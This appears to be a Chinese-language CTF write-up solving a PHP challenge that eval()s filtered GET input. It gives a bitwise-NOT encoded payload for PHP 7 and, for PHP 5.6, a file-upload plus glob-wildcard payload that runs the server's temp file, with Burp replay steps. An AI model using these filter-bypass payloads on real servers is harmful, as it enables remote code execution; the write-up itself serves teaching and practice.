<?php if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code) > 35){ die("Long."); } if(preg_match("/[A-Za-z0-9_$]+/",$code)){ die("NO."); } eval($code); }else{ highlight_file(__FILE__); }
这个代码如果要getshell,怎样利用?
这道题的限制:
1.webshell长度不超过35位
2.除了不包含字母数字,还不能包含$和_
1.对于php7环境的解题方法。
这个环境的php版本是7以上,对于7以上的php可以使用('phpinfo')()来执行命令。
显然,我们直接这么写会被检测到英文字母,所以不行。
但我们可以构造一个可以生成phpinfo这个字符串的php表达式即可。这里的~符号是取反,我们先对phpinfo进行url code编码的取反,然后将这个值放入url地址栏中,这是进行访问,url就会对这个编码进行本身的取反,然后我们加了~符号,就会再次取反一次,所以我们传进去的还是%8F%97%8F%96%91%99%90这个值,就可以拿到webshell。
这里或许就有人疑惑了,我们对phpinfo进行取反了后,是含有数字的啊,但题目会过滤数字啊,怎么就成功了呢?
对于这来所,我进行了debug查看,当程序进行到过滤函数这,我们传进来的code值是这个程序识别不了的,所以就成功绕过了这个过滤函数。
2.php在7版本以下的解决方法
7版本以上的取反操作就不行了,因为7以下的版本不支持(phpinfo)();这种执行命令的操作。
这里我们写了一个文件上传的html页面,用于上传文件.
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <form action="less8.php" method="post" enctype="multipart/form-data"> <input type="file" name="file" id=""> <input type="submit" value="submit"> </form> </body> </html>
在这里,我也是去当场下载了php5.6的版本,并调试了xdebug;先下载php5.6,以及对应的fpm和dev(phpize)等,然后切换到5.6,并去/etc/alternatives/,下查看了php,phpize和php-config是否切换到5.6上,然后就是把xdebug调试好了
在5.6版本中,我们使用上传文件的方式,在他的临时文件目录下生成我们的文件,然后执行;但现在的问题是上传到临时文件的名字是会被服务器随机命名(英文名称)的,我们怎么在文件被清除之前去匹配我们上传的文件并执行。对于执行操作,我们的权限肯定是不够的,用sh去执行的话因为有过滤,并不能执行,所以这我们使用. (点加空格)的方式去执行。
这里可以使用linux的glob通配符来匹配我们的目标临时文件,临时文件是9位字符,且他的最后一位是大写,所以我们就可以设计我们的匹配规则:/???/????????[@-[]这样
1.开启文件上传的路径。
root@ubuntu3:/tmp# vim /etc/php/5.6/fpm/php.ini
2.进行包的上传,这里先不点submit,去浏览器开启代理,去抓包
这个文件的内容是一个脚本
这个是文件上传(demo.html)抓的包
这个是php页面(less8.php)抓的包
3.将他们放在burpsuite的重放模块,进行参数的修改。
对于在重放模块中的web.php抓取的包进行修改
第一,将第一行的提交动作从GET改为POST;
第二,传参?code=?><?=`.+/???/????????[@-[]`;?>;
第三,将demo.html包里面的Content-Type和下面画圈的部分代码拷贝到web.php的包里面
最后进行发送,可见右边的回应包里的状态是200ok